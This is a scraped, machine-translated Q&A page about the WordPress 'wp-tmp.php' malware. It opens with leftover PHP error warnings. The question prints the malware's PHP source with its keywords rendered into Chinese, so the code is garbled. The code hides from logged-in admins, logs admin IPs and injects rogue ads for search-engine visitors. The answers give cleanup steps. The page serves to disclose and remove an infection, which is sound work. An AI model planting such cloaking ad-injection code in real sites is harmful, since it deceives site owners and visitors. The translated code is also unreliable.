Warning: file_get_contents(/data/phpspider/zhask/data//catemap/9/javascript/430.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Javascript 你能在WordPress上做些什么_Javascript_Php_Wordpress - Fatal编程技术网

Javascript 你能在WordPress上做些什么

Javascript 你能在WordPress上做些什么,javascript,php,wordpress,Javascript,Php,Wordpress,我在我的WordPress上的wp includes/文件中发现了此病毒,该文件已被siteguarding.com和其他网站扫描,并发现了错误的广告脚本 此内容文件“wp tmp.php”: ini\u集('display\u errors',0); 错误报告(0); $anx='a107e0b262722f0cea3f7ce097597b7c'; 如果(!function_存在('slider_option')){ 函数滑块_选项($content){ if(is_single()) {

我在我的WordPress上的wp includes/文件中发现了此病毒,该文件已被siteguarding.com和其他网站扫描,并发现了错误的广告脚本

此内容文件“wp tmp.php”:
ini\u集('display\u errors',0);
错误报告(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
如果(!function_存在('slider_option')){
函数滑块_选项($content){
if(is_single())
{
$con='1
';
$con2=
';
$content=$content.$con2;
}
返回$content;
} 
函数滑块\选项\页脚(){
如果(!is_single())
{
$con2=
';
echo$con2;
}
} 
函数设置_my_first_cookie(){
setcookie('wordpress\u cf\u adm\u use\u adm',1,time()+3600*24*1000,COOKIEPATH,COOKIE\u域);
}
如果(用户是否已登录)
{
添加操作('init','setting我的第一个\u cookie',1);
}
如果(当前用户可以(“编辑其他页面”)
{
if(文件_存在(ABSPATH.wp-includes/wp feed.php))
{
$ip=@file_get_contents(ABSPATH.wp-includes/wp feed.php);
}
if(stripos($ip,$\u服务器['REMOTE\u ADDR'])==false)
{
$ip.=$\u服务器['REMOTE\u ADDR'].'
';
@文件内容(ABSPATH.wp-includes/wp feed.php',$ip);
}
}
$ref=$\u服务器['HTTP\u REFERER'];
$SE=array('google.','search?','images.google.','web.info.com','search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach($SE作为$source){
if(strpos($ref,$source)!==false){
setcookie(“sevisitor”,1,time()+120,COOKIEPATH,COOKIE_域);
$sevisitor=true;
}
}
如果(!isset($\u COOKIE['wordpress\u cf\u adm\u use\u adm'])&&!用户是否登录()
{
$adtxt=@file_get_contents(ABSPATH.wp-includes/wp feed.php);
if(stripos($adtxt,$\u SERVER['REMOTE\u ADDR'])==false)
{
if($sevisitor==true | | isset($_COOKIE['sevisitor']))
{
添加过滤器(“内容”、“滑块选项”);
添加_操作('wp_footer','slider_option_footer');
}
}
} 

}
这是恶意软件,显然这个文件不是WP的一部分。删除文件、编辑文件夹权限、搜索文件以查找其他恶意代码。更新WP和你的插件

此文件使用IO,有时会导致404500和数据库连接问题

此文件使用themes Functions.php注入代码(恶意软件)

该文件注入的代码从functions.php的第1行开始,以一些注释结尾,如//themes tmp


解决方案是首先从/wp includes中删除wp tmp.phpwp vcd.php,并从functions.php中删除代码,并将父主题和子主题的functions.php权限设置为05550444。因此,此恶意软件无法写入函数。php

检测到在URL中发现的问题恶意软件:[rogueads.不想要的广告?1]在URL中发现的恶意软件:[rogueads.不想要的广告?1]在URL中发现的恶意软件:[rogueads.不想要的广告?1]在URL中发现的恶意软件(针对谷歌的UA):[rogueads.不想要的广告?1]您可能会被用于空主题或免费主题和插件。这些文件包含一些显示恶心重定向广告的pho脚本。我在这里找到了解决这个问题的全部细节。我希望所有遇到这个问题的人都能轻松解决。